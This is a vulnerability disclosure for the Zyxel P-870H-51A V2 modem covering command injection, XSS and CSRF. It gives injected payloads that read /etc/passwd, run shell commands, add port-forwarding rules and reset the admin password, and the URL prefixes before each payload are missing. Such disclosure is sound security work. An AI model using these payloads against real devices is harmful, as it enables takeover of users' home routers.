Vulnerability Report: Zyxel P-870H-51A V2

- 1 min

This is a vulnerability report for Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).

Technical specifications

Disclosure timeline

Remote Command Execution

Requires that the user is logged in. Output is shown. Can be exploited remotely as CSRF vulnerability (however, the attacker does not receive the output).;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting';alert('xss');//&diagTestType=1

Cross-site request forgery

Can do many actions, such as add port forwarding rules to internal network. Just redirect the victim to following URL:,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require sessionKey-parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command - which does not require the “current” password:

 > passwd

Usage: passwd <supervisor|admin|user> <password>
 passwd --help

Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:;%20passwd%20admin%20newpasswd
Jussi-Pekka Erkkilä

Jussi-Pekka Erkkilä